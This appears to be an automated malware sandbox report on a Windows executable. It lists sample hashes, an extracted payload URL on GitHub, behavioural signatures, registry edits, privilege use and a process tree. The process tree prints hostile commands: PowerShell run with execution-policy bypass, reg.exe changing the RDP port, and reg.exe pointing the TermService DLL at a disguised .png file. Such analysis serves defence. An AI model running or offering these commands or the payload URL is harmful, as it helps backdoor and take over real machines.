Overview
overview
10Static
static
Order.exe
windows7_x64
5Order.exe
windows10_x64
5????? ????...DF.exe
windows7_x64
10????? ????...DF.exe
windows10_x64
1087597.exe
windows7_x64
1087597.exe
windows10_x64
1029146c1ccd...70.exe
windows7_x64
729146c1ccd...70.exe
windows10_x64
72cc3b42957...8e.exe
windows7_x64
102cc3b42957...8e.exe
windows10_x64
10RICHIESTA ...TA.exe
windows7_x64
10RICHIESTA ...TA.exe
windows10_x64
1039c1e12e0a...25c.js
windows7_x64
139c1e12e0a...25c.js
windows10_x64
13f46e10e5f...3b.exe
windows7_x64
53f46e10e5f...3b.exe
windows10_x64
553074094ad...95dbec
linux_mipsel
685dce7a17...03.exe
windows7_x64
10685dce7a17...03.exe
windows10_x64
106c4aab4c3b...e2.exe
windows7_x64
106c4aab4c3b...e2.exe
windows10_x64
1073a52a4c60...c0.exe
windows7_x64
373a52a4c60...c0.exe
windows10_x64
3Inv_7623980.exe
windows7_x64
10Inv_7623980.exe
windows10_x64
108954739d96...a8.ps1
windows7_x64
88954739d96...a8.ps1
windows10_x64
8USD $.exe
windows7_x64
10USD $.exe
windows10_x64
1091d079d937...b9.exe
windows7_x64
91d079d937...b9.exe
windows10_x64
9706247fdb...89.exe
windows7_x64
Analysis
-
max time kernel
53s -
max time network
116s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
30-07-2021 15:25
Static task
static1
Behavioral task
behavioral1
Sample
Order.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
Order.exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
????? ?????? ????#454326_PDF.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
????? ?????? ????#454326_PDF.exe
Resource
win10v20210410
Behavioral task
behavioral5
Sample
87597.exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
87597.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe
Resource
win7v20210410
Behavioral task
behavioral8
Sample
29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe
Resource
win7v20210410
Behavioral task
behavioral10
Sample
2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
RICHIESTA DI OFFERTA.exe
Resource
win7v20210408
Behavioral task
behavioral12
Sample
RICHIESTA DI OFFERTA.exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
39c1e12e0ada85fa835b623a4698345bf95372bea57a7d3a5070ea1d5d5d825c.js
Resource
win7v20210408
Behavioral task
behavioral14
Sample
39c1e12e0ada85fa835b623a4698345bf95372bea57a7d3a5070ea1d5d5d825c.js
Resource
win10v20210410
Behavioral task
behavioral15
Sample
3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe
Resource
win7v20210408
Behavioral task
behavioral16
Sample
3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe
Resource
win10v20210410
Behavioral task
behavioral17
Sample
53074094addc55786936f3d67d7fe36554a7c4f4f96c06252ae768707295dbec
Resource
debian9-mipsel
Behavioral task
behavioral18
Sample
685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
Resource
win7v20210408
Behavioral task
behavioral19
Sample
685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
Resource
win10v20210410
Behavioral task
behavioral20
Sample
6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe
Resource
win7v20210408
Behavioral task
behavioral21
Sample
6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe
Resource
win10v20210410
Behavioral task
behavioral22
Sample
73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe
Resource
win7v20210408
Behavioral task
behavioral23
Sample
73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe
Resource
win10v20210410
Behavioral task
behavioral24
Sample
Inv_7623980.exe
Resource
win7v20210410
Behavioral task
behavioral25
Sample
Inv_7623980.exe
Resource
win10v20210408
Behavioral task
behavioral26
Sample
8954739d960eecd84aa64e657aed72d40567764023ba14e048778d0ebf24cba8.ps1
Resource
win7v20210410
Behavioral task
behavioral27
Sample
8954739d960eecd84aa64e657aed72d40567764023ba14e048778d0ebf24cba8.ps1
Resource
win10v20210408
Behavioral task
behavioral28
Sample
USD $.exe
Resource
win7v20210410
Behavioral task
behavioral29
Sample
USD $.exe
Resource
win10v20210408
Behavioral task
behavioral30
Sample
91d079d9371fa53227e4bb2207ba4d3aa4733feee607773b696779c5e87846b9.exe
Resource
win7v20210410
Behavioral task
behavioral31
Sample
91d079d9371fa53227e4bb2207ba4d3aa4733feee607773b696779c5e87846b9.exe
Resource
win10v20210410
Behavioral task
behavioral32
Sample
9706247fdb847874ca3fad6229787e37299be25d938af865a8e5b132bf313b89.exe
Resource
win7v20210408
General
-
Target
6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe
-
Size
4.6MB
-
MD5
eaee663dfeb2efcd9ec669f5622858e2
-
SHA1
2b96f0d568128240d0c53b2a191467fde440fd93
-
SHA256
6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
-
SHA512
211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 15 2104 powershell.exe 17 2104 powershell.exe 18 2104 powershell.exe 19 2104 powershell.exe 21 2104 powershell.exe 23 2104 powershell.exe 25 2104 powershell.exe 27 2104 powershell.exe 29 2104 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 3164 3164 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8199.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI81E8.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8218.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_olaj0bm5.1xs.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_bj2piuzv.0l4.psm1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8229.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI823A.tmp powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 18 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 17 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1200 powershell.exe 1200 powershell.exe 1200 powershell.exe 2756 powershell.exe 2756 powershell.exe 2756 powershell.exe 2276 powershell.exe 2276 powershell.exe 2276 powershell.exe 2320 powershell.exe 2320 powershell.exe 2320 powershell.exe 1200 powershell.exe 1200 powershell.exe 1200 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 620 620 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1200 powershell.exe Token: SeDebugPrivilege 2756 powershell.exe Token: SeIncreaseQuotaPrivilege 2756 powershell.exe Token: SeSecurityPrivilege 2756 powershell.exe Token: SeTakeOwnershipPrivilege 2756 powershell.exe Token: SeLoadDriverPrivilege 2756 powershell.exe Token: SeSystemProfilePrivilege 2756 powershell.exe Token: SeSystemtimePrivilege 2756 powershell.exe Token: SeProfSingleProcessPrivilege 2756 powershell.exe Token: SeIncBasePriorityPrivilege 2756 powershell.exe Token: SeCreatePagefilePrivilege 2756 powershell.exe Token: SeBackupPrivilege 2756 powershell.exe Token: SeRestorePrivilege 2756 powershell.exe Token: SeShutdownPrivilege 2756 powershell.exe Token: SeDebugPrivilege 2756 powershell.exe Token: SeSystemEnvironmentPrivilege 2756 powershell.exe Token: SeRemoteShutdownPrivilege 2756 powershell.exe Token: SeUndockPrivilege 2756 powershell.exe Token: SeManageVolumePrivilege 2756 powershell.exe Token: 33 2756 powershell.exe Token: 34 2756 powershell.exe Token: 35 2756 powershell.exe Token: 36 2756 powershell.exe Token: SeDebugPrivilege 2276 powershell.exe Token: SeIncreaseQuotaPrivilege 2276 powershell.exe Token: SeSecurityPrivilege 2276 powershell.exe Token: SeTakeOwnershipPrivilege 2276 powershell.exe Token: SeLoadDriverPrivilege 2276 powershell.exe Token: SeSystemProfilePrivilege 2276 powershell.exe Token: SeSystemtimePrivilege 2276 powershell.exe Token: SeProfSingleProcessPrivilege 2276 powershell.exe Token: SeIncBasePriorityPrivilege 2276 powershell.exe Token: SeCreatePagefilePrivilege 2276 powershell.exe Token: SeBackupPrivilege 2276 powershell.exe Token: SeRestorePrivilege 2276 powershell.exe Token: SeShutdownPrivilege 2276 powershell.exe Token: SeDebugPrivilege 2276 powershell.exe Token: SeSystemEnvironmentPrivilege 2276 powershell.exe Token: SeRemoteShutdownPrivilege 2276 powershell.exe Token: SeUndockPrivilege 2276 powershell.exe Token: SeManageVolumePrivilege 2276 powershell.exe Token: 33 2276 powershell.exe Token: 34 2276 powershell.exe Token: 35 2276 powershell.exe Token: 36 2276 powershell.exe Token: SeDebugPrivilege 2320 powershell.exe Token: SeIncreaseQuotaPrivilege 2320 powershell.exe Token: SeSecurityPrivilege 2320 powershell.exe Token: SeTakeOwnershipPrivilege 2320 powershell.exe Token: SeLoadDriverPrivilege 2320 powershell.exe Token: SeSystemProfilePrivilege 2320 powershell.exe Token: SeSystemtimePrivilege 2320 powershell.exe Token: SeProfSingleProcessPrivilege 2320 powershell.exe Token: SeIncBasePriorityPrivilege 2320 powershell.exe Token: SeCreatePagefilePrivilege 2320 powershell.exe Token: SeBackupPrivilege 2320 powershell.exe Token: SeRestorePrivilege 2320 powershell.exe Token: SeShutdownPrivilege 2320 powershell.exe Token: SeDebugPrivilege 2320 powershell.exe Token: SeSystemEnvironmentPrivilege 2320 powershell.exe Token: SeRemoteShutdownPrivilege 2320 powershell.exe Token: SeUndockPrivilege 2320 powershell.exe Token: SeManageVolumePrivilege 2320 powershell.exe Token: 33 2320 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 3904 wrote to memory of 1200 3904 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe powershell.exe PID 3904 wrote to memory of 1200 3904 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe powershell.exe PID 1200 wrote to memory of 744 1200 powershell.exe csc.exe PID 1200 wrote to memory of 744 1200 powershell.exe csc.exe PID 744 wrote to memory of 3988 744 csc.exe cvtres.exe PID 744 wrote to memory of 3988 744 csc.exe cvtres.exe PID 1200 wrote to memory of 2756 1200 powershell.exe powershell.exe PID 1200 wrote to memory of 2756 1200 powershell.exe powershell.exe PID 1200 wrote to memory of 2276 1200 powershell.exe powershell.exe PID 1200 wrote to memory of 2276 1200 powershell.exe powershell.exe PID 1200 wrote to memory of 2320 1200 powershell.exe powershell.exe PID 1200 wrote to memory of 2320 1200 powershell.exe powershell.exe PID 1200 wrote to memory of 2164 1200 powershell.exe reg.exe PID 1200 wrote to memory of 2164 1200 powershell.exe reg.exe PID 1200 wrote to memory of 3988 1200 powershell.exe reg.exe PID 1200 wrote to memory of 3988 1200 powershell.exe reg.exe PID 1200 wrote to memory of 1680 1200 powershell.exe reg.exe PID 1200 wrote to memory of 1680 1200 powershell.exe reg.exe PID 1200 wrote to memory of 3984 1200 powershell.exe net.exe PID 1200 wrote to memory of 3984 1200 powershell.exe net.exe PID 3984 wrote to memory of 2200 3984 net.exe net1.exe PID 3984 wrote to memory of 2200 3984 net.exe net1.exe PID 1200 wrote to memory of 4040 1200 powershell.exe cmd.exe PID 1200 wrote to memory of 4040 1200 powershell.exe cmd.exe PID 4040 wrote to memory of 1304 4040 cmd.exe cmd.exe PID 4040 wrote to memory of 1304 4040 cmd.exe cmd.exe PID 1304 wrote to memory of 1880 1304 cmd.exe net.exe PID 1304 wrote to memory of 1880 1304 cmd.exe net.exe PID 1880 wrote to memory of 3600 1880 net.exe net1.exe PID 1880 wrote to memory of 3600 1880 net.exe net1.exe PID 1200 wrote to memory of 2164 1200 powershell.exe cmd.exe PID 1200 wrote to memory of 2164 1200 powershell.exe cmd.exe PID 2164 wrote to memory of 3736 2164 cmd.exe cmd.exe PID 2164 wrote to memory of 3736 2164 cmd.exe cmd.exe PID 3736 wrote to memory of 2784 3736 cmd.exe net.exe PID 3736 wrote to memory of 2784 3736 cmd.exe net.exe PID 2784 wrote to memory of 3964 2784 net.exe net1.exe PID 2784 wrote to memory of 3964 2784 net.exe net1.exe PID 2700 wrote to memory of 3588 2700 cmd.exe net.exe PID 2700 wrote to memory of 3588 2700 cmd.exe net.exe PID 3588 wrote to memory of 1680 3588 net.exe net1.exe PID 3588 wrote to memory of 1680 3588 net.exe net1.exe PID 2136 wrote to memory of 1560 2136 cmd.exe net.exe PID 2136 wrote to memory of 1560 2136 cmd.exe net.exe PID 1560 wrote to memory of 3136 1560 net.exe net1.exe PID 1560 wrote to memory of 3136 1560 net.exe net1.exe PID 3852 wrote to memory of 2200 3852 cmd.exe net.exe PID 3852 wrote to memory of 2200 3852 cmd.exe net.exe PID 2200 wrote to memory of 2316 2200 net.exe net1.exe PID 2200 wrote to memory of 2316 2200 net.exe net1.exe PID 960 wrote to memory of 1244 960 cmd.exe net.exe PID 960 wrote to memory of 1244 960 cmd.exe net.exe PID 1244 wrote to memory of 2352 1244 net.exe net1.exe PID 1244 wrote to memory of 2352 1244 net.exe net1.exe PID 1532 wrote to memory of 3960 1532 cmd.exe net.exe PID 1532 wrote to memory of 3960 1532 cmd.exe net.exe PID 3960 wrote to memory of 2080 3960 net.exe net1.exe PID 3960 wrote to memory of 2080 3960 net.exe net1.exe PID 188 wrote to memory of 3980 188 cmd.exe net.exe PID 188 wrote to memory of 3980 188 cmd.exe net.exe PID 3980 wrote to memory of 3424 3980 net.exe net1.exe PID 3980 wrote to memory of 3424 3980 net.exe net1.exe PID 800 wrote to memory of 2320 800 cmd.exe WMIC.exe PID 800 wrote to memory of 2320 800 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe"C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\likclxcl\likclxcl.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:744 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES403B.tmp" "c:\Users\Admin\AppData\Local\Temp\likclxcl\CSC481DC0B26B0F48F6857BB171B79C72BC.TMP"4⤵PID:3988
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2164
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3988 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1680
-
